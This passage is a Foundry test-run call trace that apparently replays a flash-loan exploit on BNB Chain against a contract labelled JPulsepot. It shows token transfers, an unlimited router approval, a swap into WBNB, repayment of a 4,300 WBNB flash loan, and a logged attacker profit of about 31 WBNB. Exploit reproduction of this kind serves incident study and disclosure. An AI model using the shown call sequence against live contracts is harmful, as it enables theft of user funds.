    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [30445] 0x404460C6A5EdE2D891e8297795264fDe62ADBB75::transfer(0x384b9fb6E42dab87F3023D87ea1575499A69998E, 16278878565747828785 [1.627e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e, to: 0x384b9fb6E42dab87F3023D87ea1575499A69998E, value: 16278878565747828785 [1.627e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x7a8a83883374ebb670026484a5db830e6ee4f911f570e643f60d1dbd68b9ee2d: 0x000000000000000000000000000000000000000000001307d1ec408097178bdd → 0x000000000000000000000000000000000000000000001306f0020eb229f8e3ac
    │   │   │   │   │   │   @ 0x9dfb2af466b9814ac6d1df4767f6b2b361388fd602aac25983ec0d8ac079b5b3: 0 → 0x000000000000000000000000000000000000000000000000e1ea31ce6d1ea831
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1d9e8bcf08d097e1c82c99edc18205018fd994ef7677500ba3a4e4c1a2bc38f7: 0x000000000000000000000000000000000000000000000563de67eb9a1f79c41e → 0x000000000000000000000000000000000000000000000564c0521d688c986c4f
    │   │   │   │   │   @ 0xd65f861254002b91b7a0ec6bdba7a175d7f48036701f7f1701bdef02f9ce4e11: 0x000000000000000000000000000000000000000000001307d1ec408097178bdd → 0x000000000000000000000000000000000000000000001306f0020eb229f8e3ac
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [32995] 0x404460C6A5EdE2D891e8297795264fDe62ADBB75::transferAndCall(0xc587d9053cd1118f25F645F9E08BB98c9712A4EE, 16278878565747828785 [1.627e19], 0x00000000000000000000000000000000000000000000000000000000000002a3)
    │   │   │   │   ├─ emit Transfer(from: 0x384b9fb6E42dab87F3023D87ea1575499A69998E, to: 0xc587d9053cd1118f25F645F9E08BB98c9712A4EE, value: 16278878565747828785 [1.627e19])
    │   │   │   │   ├─ emit Transfer(param0: 0x384b9fb6E42dab87F3023D87ea1575499A69998E, param1: 0xc587d9053cd1118f25F645F9E08BB98c9712A4EE, param2: 16278878565747828785 [1.627e19], param3: 0x00000000000000000000000000000000000000000000000000000000000002a3)
    │   │   │   │   ├─ [17758] 0xc587d9053cd1118f25F645F9E08BB98c9712A4EE::onTokenTransfer(0x384b9fb6E42dab87F3023D87ea1575499A69998E, 16278878565747828785 [1.627e19], 0x00000000000000000000000000000000000000000000000000000000000002a3)
    │   │   │   │   │   ├─  emit topic 0: 0xd39ec07f4e209f627a4c427971473820dc129761ba28de8906bd56f57101d4f8
    │   │   │   │   │   │        topic 1: 0x00000000000000000000000000000000000000000000000000000000000002a3
    │   │   │   │   │   │           data: 0x0000000000000000000000000000000000000000000000170cce5be1ba76dca2000000000000000000000000000000000000000000000017eeb88db0279584d3
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 5: 0x000000000000000000000000000002e29f9cb59d27b0234a0000000000000420 → 0x000000000000000000000000000002e38186e76b94cecb7b0000000000000420
    │   │   │   │   │   │   @ 0x3a16b4b9d86cfde2099101cbc4817a1f3fef7cf964e71eda8f09c167921b4d5c: 0x000000000000000000000000000000000000a397000000170cce5be1ba76dca2 → 0x000000000000000000000000000000000000a39700000017eeb88db0279584d3
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x9dfb2af466b9814ac6d1df4767f6b2b361388fd602aac25983ec0d8ac079b5b3: 0x000000000000000000000000000000000000000000000000e1ea31ce6d1ea831 → 0
    │   │   │   │   │   @ 0x551b89053db4e84625f9a7c682d45fff53afcbdfce4682d5a9ca6be0fb9820af: 0x0000000000000000000000000000000000000000000002e29f9cb59d27b0234a → 0x0000000000000000000000000000000000000000000002e38186e76b94cecb7b
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ emit SuppliedLink(: 16278878565747828785 [1.627e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x679795a0195a1b76cdebb7c51d74e058aee92919b8c3389af86ef24535e8a297: 0x00000000000000000000000000000000000000000000002a6d16a287e6d5c000 → 0
    │   │   │   │   @ 0xb6c61a840592cc84133e4b25bd509abf4659307c57b160799b38490a5aa48f2c: 0x0000000000000000000000000000000000000000000000029b62003550890000 → 0x00000000000000000000000000000000000000000000000227816fad6ec4f571
    │   │   │   │   @ 0xe90b7bceb6e7df5418fb78d8ee546e97c83a08bbccc01a0644d599ccd2a7c2eb: 0x00000000000000000000000000000000000000000000000034be719045598000 → 0
    │   │   │   │   @ 0x679795a0195a1b76cdebb7c51d74e058aee92919b8c3389af86ef24535e8a298: 0x0000000000000000000000000000000000000000000000000000000064a5315b → 0x000000000000000000000000000000000000000000000000000000006780eaee
    │   │   │   │   @ 0xe90b7bceb6e7df5418fb78d8ee546e97c83a08bbccc01a0644d599ccd2a7c2e3: 0x000000000000000000000000000000000000000000000000f4412e8c90c90000 → 0
    │   │   │   │   @ 0xe90b7bceb6e7df5418fb78d8ee546e97c83a08bbccc01a0644d599ccd2a7c2ec: 0x0000000000000000000000000000000000000000000000000000000064a5315b → 0x000000000000000000000000000000000000000000000000000000006780eaee
    │   │   │   │   @ 0x679795a0195a1b76cdebb7c51d74e058aee92919b8c3389af86ef24535e8a28f: 0x0000000000000000000000000000000000000000000007bff944f620a6db2000 → 0
    │   │   │   │   @ 0xa1930aa930426c54c34daad2b9ada7c5d0ef0c96078a3c5bb79f6fa6602c4a7a: 0x0000000000000000000000000000000000000000000000013196c155421a0000 → 0x000000000000000000000000000000000000000000000000c2c2376d3a1521ee
    │   │   │   └─ ← [Stop]
    │   │   ├─ [24562] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::balanceOf(JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 17356089427655381925726 [1.735e22]
    │   │   ├─ [53973] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(17356089427655381925726 [1.735e22], 0, [0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1736501998 [1.736e9])
    │   │   │   ├─ [6034] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::transferFrom(JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, 17356089427655381925726 [1.735e22])
    │   │   │   │   ├─ emit Transfer(from: JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, value: 17356089427655381925726 [1.735e22])
    │   │   │   │   ├─ emit Approval(owner: JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564022101494580257747714209 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffc531fdfae0ce02d40a1
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000003ace02051f31fd2bf5e → 0
    │   │   │   │   │   @ 0x8a489ea344a3a07b0cdfa9d1a5f7e562e8e7801e934af5b7a32cbede3ef02c99: 0x00000000000000000000000000000000000000000000007d42bcb6ce80ef5cf0 → 0x00000000000000000000000000000000000000000000042a22dd08c1a0c21c4e
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 4909491305247980745162 [4.909e21], 2310651928713861487856 [2.31e21], 1736501998 [1.736e9]
    │   │   │   ├─ [531] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   └─ ← [Return] 19666741356369243413582 [1.966e22]
    │   │   │   ├─ [38255] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::swap(4331398120414037532669 [4.331e21], 0, JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [23162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 4331398120414037532669 [4.331e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, to: JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 4331398120414037532669 [4.331e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000eace3959c92955dffd
    │   │   │   │   │   │   @ 0x66ec1991f6397975a4f4a1234495c6e178d730f45f32c044c0a3953f810d8b92: 0x00000000000000000000000000000000000000000000010a24e0ea85f6c171ca → 0x00000000000000000000000000000000000000000000001f56a790bccd6b91cd
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   │   └─ ← [Return] 578093184833943212493 [5.78e20]
    │   │   │   │   ├─ [531] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   │   └─ ← [Return] 19666741356369243413582 [1.966e22]
    │   │   │   │   ├─ emit Sync(reserve0: 578093184833943212493 [5.78e20], reserve1: 19666741356369243413582 [1.966e22])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 17356089427655381925726 [1.735e22], amount0Out: 4331398120414037532669 [4.331e21], amount1Out: 0, to: JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x6780eaee00000000007d42bcb6ce80ef5cf000000000010a24e0ea85f6c171ca → 0x6780eaee00000000042a22dd08c1a0c21c4e00000000001f56a790bccd6b91cd
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 4331398120414037532669 [4.331e21]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x172fcD41E0913e95784454622d1c3724f546f849, 4300430000000000000000 [4.3e21])
    │   │   │   ├─ emit Transfer(from: JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x172fcD41E0913e95784454622d1c3724f546f849, value: 4300430000000000000000 [4.3e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xed93f154226bea5228a538ddd7f6e1b8d878a5d95dc495daa8ac4679fe6b0986: 0x000000000000000000000000000000000000000000000009ab9967516b77a5c3 → 0x0000000000000000000000000000000000000000000000f2cc0de3a9d492a5c3
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000eace3959c92955dffd → 0x000000000000000000000000000000000000000000000001adc4dd70c03adffd
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x172fcD41E0913e95784454622d1c3724f546f849) [staticcall]
    │   │   └─ ← [Return] 3178686471569296579127296 [3.178e24]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x172fcD41E0913e95784454622d1c3724f546f849) [staticcall]
    │   │   └─ ← [Return] 4478815724514701387203 [4.478e21]
    │   ├─ emit Flash(param0: JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0, param3: 4300000000000000000000 [4.3e21], param4: 0, param5: 430000000000000000 [4.3e17])
    │   ├─  storage changes:
    │   │   @ 3: 0x00000000000000000000000000000000011607b3427d0292b4cba3d565bce96c → 0x000000000000000000000000000000000116097133e827e2ab63e97ed52698e4
    │   │   @ 4: 0x000000000000000068a8ec39285d679a000000000000011a6b4bb19864033c94 → 0x00000000000000006aa10d857dfe279a000000000000011a6b4bb19864033c94
    │   └─ ← [Stop]
    ├─ [1264] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::symbol() [staticcall]
    │   └─ ← [Return] "WBNB"
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 30968120414037532669 [3.096e19]
    ├─ [444] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker WBNB Balance After exploit", val: 30968120414037532669 [3.096e19], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0x000000000000000000000000000000000000000000000000000000000ce40ce4 → 0x000000000000000000000000000000000000000000000000000000010ce40ce4
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 36.08s (34.72s CPU time)

Ran 2 test suites in 37.21s (36.65s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
